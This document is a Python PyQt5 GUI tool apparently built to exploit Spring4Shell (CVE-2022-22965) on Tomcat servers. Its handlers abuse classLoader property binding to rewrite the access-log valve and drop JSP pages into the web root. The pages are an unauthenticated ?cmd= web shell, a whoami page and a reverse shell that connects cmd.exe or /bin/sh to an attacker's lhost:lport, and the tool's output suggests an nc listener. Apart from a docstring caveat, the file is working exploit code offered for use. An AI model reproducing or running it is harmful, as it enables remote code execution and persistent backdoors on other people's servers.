# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'myui.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! Regenerating this file from myui.ui overwrites it: the hand-written shell()/whoami()/reverse()/deltext() handlers below would be lost.
import time
from urllib.parse import urljoin, urlparse
import requests
from PyQt5 import QtCore, QtGui, QtWidgets
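class Ui_MainWindow(object):
    """Main window of a CVE-2022-22965 (Spring4Shell) check tool.

    ``setupUi``/``retranslateUi`` are Qt Designer output; ``shell``,
    ``whoami``, ``reverse`` and ``deltext`` are hand-written button handlers
    (so regenerating this file from ``myui.ui`` would drop them).

    Each probe POSTs a set of
    ``class.module.classLoader.resources.context.parent.pipeline.first.*``
    properties to the target URL.  If the binding succeeds, the first valve
    of the Tomcat context pipeline (presumably the access-log valve on a
    stock Tomcat) is re-pointed so that its log file is written as
    ``webapps/ROOT/<name>.jsp`` with a "pattern" that is really JSP source;
    a follow-up GET of that page then tells whether it was created.

    Operator caveats:

    * ``shell()`` leaves an *unauthenticated* command page (``?cmd=``) on the
      target; ``whoami()`` and ``reverse()`` leave pages as well.  Anyone who
      learns the URL can use them -- remove them once testing is done.
    * Every request is sent with ``verify=False``; the TLS identity of the
      target is never checked.
    * The existence probe is a plain GET of the dropped page, so the page
      runs once before the result is shown.  For ``reverse()`` that means
      the target already tries to connect to lhost:lport at probe time.
    * Run only against systems you are authorised to test.
    """

    # Headers sent with every probe.  The valve pattern references them as
    # %{c2}i, %{c1}i and %{suffix}i, which is how "<%", "Runtime" and "%>//"
    # reach the written file without appearing in the form body itself.
    _HEADERS = {
        "suffix": "%>//",
        "c1": "Runtime",
        "c2": "<%",
        "DNT": "1",
        "Content-Type": "application/x-www-form-urlencoded",
    }

    # Dotted prefix shared by every property the payload sets.
    _VALVE = "class.module.classLoader.resources.context.parent.pipeline.first."

    # Characters accepted in lhost.  The value is spliced verbatim into a
    # percent-encoded form body and into a Java string literal, so anything
    # beyond a plain host / IP (incl. bracketed IPv6) is refused, not sent.
    _HOST_CHARS = frozenset(
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.-:[]"
    )

    def setupUi(self, MainWindow):
        """Build the widget tree (Qt Designer output, left as generated)."""
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(1292, 708)
        font = QtGui.QFont()
        font.setPointSize(15)
        MainWindow.setFont(font)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        # Target OS selector for reverse(): both buttons share the same parent
        # widget, so Qt keeps them mutually exclusive.
        self.radioButton_win = QtWidgets.QRadioButton(self.centralwidget)
        self.radioButton_win.setGeometry(QtCore.QRect(770, 230, 201, 91))
        font = QtGui.QFont()
        font.setPointSize(20)
        self.radioButton_win.setFont(font)
        self.radioButton_win.setIconSize(QtCore.QSize(50, 50))
        self.radioButton_win.setObjectName("radioButton_win")
        self.radioButton_linux = QtWidgets.QRadioButton(self.centralwidget)
        self.radioButton_linux.setGeometry(QtCore.QRect(980, 250, 201, 61))
        font = QtGui.QFont()
        font.setPointSize(20)
        self.radioButton_linux.setFont(font)
        self.radioButton_linux.setObjectName("radioButton_linux")
        # Output pane every handler appends to.
        self.textBrowser_print = QtWidgets.QTextBrowser(self.centralwidget)
        self.textBrowser_print.setGeometry(QtCore.QRect(10, 340, 971, 291))
        self.textBrowser_print.setObjectName("textBrowser_print")
        self.lineEdit_url = QtWidgets.QLineEdit(self.centralwidget)
        self.lineEdit_url.setGeometry(QtCore.QRect(140, 70, 541, 41))
        self.lineEdit_url.setObjectName("lineEdit_url")
        self.pushButton_insertshell = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton_insertshell.setGeometry(QtCore.QRect(30, 160, 171, 51))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.pushButton_insertshell.setFont(font)
        self.pushButton_insertshell.setObjectName("pushButton_insertshell")
        self.pushButton_insertwhoami = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton_insertwhoami.setGeometry(QtCore.QRect(250, 160, 161, 51))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.pushButton_insertwhoami.setFont(font)
        self.pushButton_insertwhoami.setObjectName("pushButton_insertwhoami")
        self.lineEdit_lhost = QtWidgets.QLineEdit(self.centralwidget)
        self.lineEdit_lhost.setGeometry(QtCore.QRect(900, 40, 320, 41))
        self.lineEdit_lhost.setText("")
        self.lineEdit_lhost.setObjectName("lineEdit_lhost")
        self.pushButton_reverseshell = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton_reverseshell.setGeometry(QtCore.QRect(1080, 130, 141, 51))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.pushButton_reverseshell.setFont(font)
        self.pushButton_reverseshell.setObjectName("pushButton_reverseshell")
        self.lineEdit_lport = QtWidgets.QLineEdit(self.centralwidget)
        self.lineEdit_lport.setGeometry(QtCore.QRect(910, 150, 141, 41))
        self.lineEdit_lport.setObjectName("lineEdit_lport")
        self.label_url = QtWidgets.QLabel(self.centralwidget)
        self.label_url.setGeometry(QtCore.QRect(30, 70, 101, 41))
        font = QtGui.QFont()
        font.setPointSize(20)
        self.label_url.setFont(font)
        self.label_url.setObjectName("label_url")
        self.label_lhost = QtWidgets.QLabel(self.centralwidget)
        self.label_lhost.setGeometry(QtCore.QRect(720, 20, 171, 71))
        font = QtGui.QFont()
        font.setPointSize(20)
        self.label_lhost.setFont(font)
        self.label_lhost.setObjectName("label_lhost")
        self.label_lport = QtWidgets.QLabel(self.centralwidget)
        self.label_lport.setGeometry(QtCore.QRect(720, 130, 171, 71))
        font = QtGui.QFont()
        font.setPointSize(20)
        self.label_lport.setFont(font)
        self.label_lport.setObjectName("label_lport")
        self.pushButton_del = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton_del.setGeometry(QtCore.QRect(20, 290, 111, 41))
        # objectName "pushButton" (not "pushButton_del") is what myui.ui
        # declares; kept as-is since nothing here relies on
        # connectSlotsByName's on_<objectName>_<signal> convention.
        self.pushButton_del.setObjectName("pushButton")
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 1292, 32))
        self.menubar.setObjectName("menubar")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        """Set the (Chinese) captions of all widgets."""
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
        self.radioButton_win.setText(_translate("MainWindow", "windows"))
        self.radioButton_linux.setText(_translate("MainWindow", "linux"))
        self.pushButton_insertshell.setText(_translate("MainWindow", "插入shell"))
        self.pushButton_insertwhoami.setText(_translate("MainWindow", "插入whoami"))
        self.pushButton_reverseshell.setText(_translate("MainWindow", "反弹shell"))
        self.label_url.setText(_translate("MainWindow", "url:"))
        self.label_lhost.setText(_translate("MainWindow", "lhost:"))
        self.label_lport.setText(_translate("MainWindow", "lport:"))
        self.pushButton_del.setText(_translate("MainWindow", "清空"))

    # ------------------------------------------------------------------
    # Helpers shared by the three probes
    # ------------------------------------------------------------------

    def _log(self, text):
        """Append *text* to the output pane."""
        self.textBrowser_print.insertPlainText(text)

    @staticmethod
    def _stamp(prefix):
        """Return ``<prefix>_Y_M_D_h_m_s`` from the local clock (no zero padding).

        Used as the file prefix of the dropped page so repeated runs do not
        collide on the same name.
        """
        now = time.localtime(time.time())
        fields = (now.tm_year, now.tm_mon, now.tm_mday, now.tm_hour, now.tm_min, now.tm_sec)
        return prefix + "_" + "_".join(str(v) for v in fields)

    @staticmethod
    def _payload(pattern, prefix):
        """Build the form body that re-points the valve's log file.

        *pattern* is the already percent-encoded JSP source; *prefix* is the
        bare file name, written as ``webapps/ROOT/<prefix>.jsp`` (empty
        ``fileDateFormat`` keeps the date out of the file name).
        """
        v = Ui_MainWindow._VALVE
        return (
            v + "pattern=" + pattern
            + "&" + v + "suffix=.jsp"
            + "&" + v + "directory=webapps/ROOT"
            + "&" + v + "prefix=" + prefix
            + "&" + v + "fileDateFormat="
        )

    @staticmethod
    def _shell_url(url, name):
        """Return ``scheme://host[:port]/<name>.jsp`` for the page dropped into ROOT.

        Only scheme and netloc of *url* are kept; the path the user entered
        is irrelevant because the file lands in the ROOT context.
        """
        parts = urlparse(url)
        return urljoin(parts.scheme + "://" + parts.netloc, name + ".jsp")

    def _deploy(self, url, name, pattern):
        """POST the payload for *pattern*/*name* to *url*, then GET the page.

        Returns ``(shell_url, exists)``.  ``exists`` is True only when the GET
        answers 200 *without* following redirects -- a catch-all route that
        redirects unknown paths to some 200 page would otherwise produce a
        false positive.  The POST response is not inspected.  Raises whatever
        ``requests`` raises (timeouts, connection errors, bad URLs).
        """
        requests.post(url, headers=self._HEADERS, data=self._payload(pattern, name),
                      timeout=15, allow_redirects=False, verify=False)
        shell_url = self._shell_url(url, name)
        probe = requests.get(shell_url, timeout=15, allow_redirects=False, verify=False)
        return shell_url, probe.status_code == 200

    # ------------------------------------------------------------------
    # Button handlers
    # ------------------------------------------------------------------

    def shell(self):
        """Drop ``shell_<stamp>.jsp`` that runs ``?cmd=`` via Runtime.exec.

        Logs the page URL on success.  Note the page takes ``cmd`` from any
        requester -- there is no authentication on it.
        """
        url = self.lineEdit_url.text()
        if not url:
            self._log("请输入url\n")
            return
        name = self._stamp("shell")
        pattern = "%25%7Bc2%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di"
        # Slot is a top-level boundary: an uncaught exception here would take
        # the Qt event loop down, so everything is reported to the pane.
        try:
            shell_url, found = self._deploy(url, name, pattern)
        except Exception as e:
            self._log(str(e) + "\n")
            return
        if found:
            self._log("[*]" + url + "漏洞存在\n[*]shell地址为:" + shell_url + "?cmd=whoami\n[*]请注意:如需再次检测,需要重启测试的服务器\n")
        else:
            self._log("[*]" + url + "未发现漏洞\n")

    def whoami(self):
        """Drop ``whoami_<stamp>.jsp`` whose only action is to print ``whoami``."""
        url = self.lineEdit_url.text()
        if not url:
            self._log("请输入url\n")
            return
        name = self._stamp("whoami")
        pattern = "%25%7Bc2%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(%22whoami%22).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%20%25%7Bsuffix%7Di"
        try:
            shell_url, found = self._deploy(url, name, pattern)
        except Exception as e:
            self._log(str(e) + "\n")
            return
        if found:
            self._log("[*]" + url + "漏洞存在\n[*]whoami地址为:" + shell_url + "\n[*]请注意:如需再次检测,需要重启测试的服务器\n")
        else:
            self._log("[*]" + url + "未发现漏洞\n")

    def reverse(self):
        """Drop ``reverse_<stamp>.jsp`` that connects a shell back to lhost:lport.

        Requires url, lhost, lport and an OS selection.  lhost/lport are
        validated before use because they are spliced verbatim into the
        percent-encoded form body and into Java source
        (``new Socket("<lhost>", <lport>)``): an '&', '%', '"' or space would
        corrupt the request and a non-numeric port would not compile, and the
        tool would then report "未发现漏洞" for a request that was never
        valid.  The existence probe GET runs the page once, so the target
        attempts the connection immediately; the listener suggested in the
        output must be up *before* the URL is visited again.
        """
        url = self.lineEdit_url.text()
        lhost = self.lineEdit_lhost.text()
        lport = self.lineEdit_lport.text()
        if self.radioButton_win.isChecked():
            shellpath = "cmd.exe"
        elif self.radioButton_linux.isChecked():
            shellpath = "/bin/sh"
        else:
            shellpath = None
        if not (url and lhost and lport and shellpath):
            self._log("请完整输入参数\n")
            return
        if not (all(c in "0123456789" for c in lport) and 0 < int(lport) < 65536):
            self._log("[*]lport必须是1-65535之间的整数\n")
            return
        # Normalise "0080" -> "80": a leading zero would make the Java literal
        # octal (and "08"/"09" would not compile at all).
        lport = str(int(lport))
        if not all(c in self._HOST_CHARS for c in lhost):
            self._log("[*]lhost只能包含字母、数字和 . - : [ ]\n")
            return
        name = self._stamp("reverse")
        pattern = (
            "%25%7Bc2%7Di%40page%20import%3D%22java.lang.*%22%25%7Bsuffix%7Di%0A%25%7Bc2%7Di%40page%20import%3D%22java.util.*%22%25%7Bsuffix%7Di%0A%25%7Bc2%7Di%40page%20import%3D%22java.io.*%22%25%7Bsuffix%7Di%0A%25%7Bc2%7Di%40page%20import%3D%22java.net.*%22%25%7Bsuffix%7Di%0A%0A%25%7Bc2%7Di%0A%20%20class%20StreamConnector%20extends%20Thread%0A%20%20%7B%0A%20%20%20%20InputStream%20ef%3B%0A%20%20%20%20OutputStream%20j0%3B%0A%0A%20%20%20%20StreamConnector(%20InputStream%20ef%2C%20OutputStream%20j0%20)%0A%20%20%20%20%7B%0A%20%20%20%20%20%20this.ef%20%3D%20ef%3B%0A%20%20%20%20%20%20this.j0%20%3D%20j0%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20public%20void%20run()%0A%20%20%20%20%7B%0A%20%20%20%20%20%20BufferedReader%20t1%20%20%3D%20null%3B%0A%20%20%20%20%20%20BufferedWriter%20cAO%20%3D%20null%3B%0A%20%20%20%20%20%20try%0A%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20t1%20%20%3D%20new%20BufferedReader(%20new%20InputStreamReader(%20this.ef%20)%20)%3B%0A%20%20%20%20%20%20%20%20cAO%20%3D%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.j0%20)%20)%3B%0A%20%20%20%20%20%20%20%20char%20buffer%5B%5D%20%3D%20new%20char%5B8192%5D%3B%0A%20%20%20%20%20%20%20%20int%20length%3B%0A%20%20%20%20%20%20%20%20while(%20(%20length%20%3D%20t1.read(%20buffer%2C%200%2C%20buffer.length%20)%20)%20%3E%200%20)%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%20%20cAO.write(%20buffer%2C%200%2C%20length%20)%3B%0A%20%20%20%20%20%20%20%20%20%20cAO.flush()%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%20catch(%20Exception%20e%20)%7B%7D%0A%20%20%20%20%20%20try%0A%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20if(%20t1%20!%3D%20null%20)%0A%20%20%20%20%20%20%20%20%20%20t1.close()%3B%0A%20%20%20%20%20%20%20%20if(%20cAO%20!%3D%20null%20)%0A%20%20%20%20%20%20%20%20%20%20cAO.close()%3B%0A%20%20%20%20%20%20%7D%20catch(%20Exception%20e%20)%7B%7D%0A%20%20%20%20%7D%0A%20%20%7D%0A%0A%20%20try%0A%20%20%7B%0A%20%20%20%20String%20ShellPath%3B%0A%20%20%20%20ShellPath%20%3D%20new%20String(%22"
            + shellpath
            + "%22)%3B%0A%20%20%20%20Socket%20socket%20%3D%20new%20Socket(%20%22"
            + lhost
            + "%22%2C%20"
            + lport
            + "%20)%3B%0A%20%20%20%20Process%20process%20%3D%20Runtime.getRuntime().exec(%20ShellPath%20)%3B%0A%20%20%20%20(%20new%20StreamConnector(%20process.getInputStream()%2C%20socket.getOutputStream()%20)%20).start()%3B%0A%20%20%20%20(%20new%20StreamConnector(%20socket.getInputStream()%2C%20process.getOutputStream()%20)%20).start()%3B%0A%20%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%0A%25%7Bsuffix%7Di"
        )
        try:
            shell_url, found = self._deploy(url, name, pattern)
        except Exception as e:
            self._log(str(e) + "\n")
            return
        if found:
            self._log("[*]" + url + "漏洞存在\n[*]reverse.jsp插入成功,访问:\n" + shell_url + "即可反弹shell\n请在你的" + lhost + "服务器上运行\nnc -lvvp " + lport + "\n[*]请注意:如需再次检测,需要重启测试的服务器\n")
        else:
            self._log("[*]" + url + "未发现漏洞\n")

    def deltext(self):
        """Clear the output pane."""
        self.textBrowser_print.setText("")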